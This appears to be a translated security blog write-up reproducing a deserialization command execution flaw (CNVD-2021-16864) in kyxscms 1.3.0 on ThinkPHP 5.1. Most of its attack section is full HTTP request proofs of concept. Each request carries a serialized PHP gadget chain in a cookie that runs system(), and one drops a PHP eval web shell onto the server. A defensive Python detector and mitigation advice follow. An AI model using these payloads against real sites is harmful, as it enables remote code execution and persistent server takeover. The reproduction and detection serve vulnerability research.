kycms1.3.0 command execution exploitation
kyxscms framework command execution (CNVD-2021-16864)
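KYXSCMS provides a lightweight solution for novel-reading websites, built on ThinkPHP5.1+MySQL.
KYXSCMS's main selling points are flexibility, convenience, and a user-friendly, easy-to-use design. It is a first choice for quickly setting up a novel site: in just 5 minutes you can build an industry site with a massive catalogue of novels, either by batch-collecting data from target sites or by using the data alliance to collect large amounts of data automatically. It ships with built-in tag templates, so even front-end developers who do not write code can quickly build an attractive novel site.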
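Vulnerable environment
Install phpstudy.
Then download the kyxscms1.3.0 source code:
http://bbs.kyxscms.com/?t/1.html
Set the site root directory to the location where the source code is stored.
Then add the pseudo-static (URL rewrite) rules in the site management panel.
You can then open the site; if the installation wizard appears, the setup succeeded.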
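Affected versions
kyxscms <= 1.3.0
thinkphp <= 5.1.33
Vulnerability reproduction
Follow the wizard to the next step; in the database settings, use the password of the database that ships with phpstudy.
Once the database has been created, go to the front end.
First register an account, then log in and capture the request. The PoC is as follows: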
GET /user/recentread HTTP/1.1
Host: kyxscms:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4enrahv5gfh6gp0rkco864bh6j; lf___forward__=%2Fapi%2Fcrontab%2Findex; lf_user_auth=think%3A%7B%22uid%22%3A%221%22%2C%22username%22%3A%22blank%22%7D; lf_user_auth_sign=e93ece5c38646339207bed9799c931170e9959ff;lf_read_log=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22lin%22%3Bs%3A<length of the command string>%3A%22<command to execute>%22%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A3%3A%22lin%22%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

The command executes successfully.
Writing a shell
GET /user/index/index.html HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Phpstorm-11743061=7c75807e-0da5-4430-8229-b17234f7ff48; Webstorm-f8f6f435=146833d1-7a32-4b5f-b3ec-2e51c5287eb1; lf___forward__=%2F; lf_user_auth=think%3A%7B%22uid%22%3A%221%22%2C%22username%22%3A%22blank%22%7D; lf_user_auth_sign=e93ece5c38646339207bed9799c931170e9959ff;lf_read_log=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22lin%22%3Bs%3A42%3A%22echo+%22%3C%3Fphp+%40eval%28%24_POST%5Bedi%5D%29%3B%3F%3E%22%3Eedi.php%22%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A3%3A%22lin%22%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D
Upgrade-Insecure-Requests: 1

The upload exploit succeeds.
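Both requests above deliver a PHP serialized object in the lf_read_log cookie. As an added example (not from the original article or the kyxscms project), the following Python detector parses a captured Cookie header and flags any cookie whose decoded value contains a serialized PHP object; the function names and the sample headers are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Serialized PHP object header: O:<name length>:"<class name>":<property count>:{
# (C: is the variant used by classes with custom serialization.)
PHP_OBJECT = re.compile(r'\b[OC]:\d+:"([A-Za-z_\\][A-Za-z0-9_\\]*)":\d+:\{')

# The two class names that appear in the lf_read_log values on this page.
KNOWN_GADGET_CLASSES = {r"think\process\pipes\Windows", r"think\model\Pivot"}


def parse_cookie_header(header):
    """Split a Cookie header into {name: decoded value}.

    unquote_plus mirrors PHP's cookie decoding, which also maps '+' to a space.
    """
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = unquote_plus(value)
    return cookies


def find_serialized_objects(header):
    """Return [(cookie name, class name, is_known_gadget)] for each object found."""
    findings = []
    for name, value in parse_cookie_header(header).items():
        for cls in PHP_OBJECT.findall(value):
            findings.append((name, cls, cls in KNOWN_GADGET_CLASSES))
    return findings


# Constructed sample: an empty object of a class named on this page (no payload).
SAMPLE = ("PHPSESSID=constructedsessionid; "
          "lf_read_log=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A0%3A%7B%7D")
# Constructed sample: a serialized array of integers, which contains no object.
BENIGN = "PHPSESSID=constructedsessionid; lf_read_log=a%3A1%3A%7Bi%3A0%3Bi%3A42%3B%7D"

if __name__ == "__main__":
    for header in (SAMPLE, BENIGN):
        print(find_serialized_objects(header))
```

The known-class flag only covers the two classes named on this page; any serialized object in a client-controlled cookie deserves review. On the application side, and assuming the cookie is passed to PHP's unserialize(), calling it with `['allowed_classes' => false]` or storing the data as JSON prevents the cookie from instantiating arbitrary classes.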
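The source code used in this article can also be obtained by following us. To learn more about security, follow the EDI Security (EDI安全) official account, and let's learn more penetration testing techniques together.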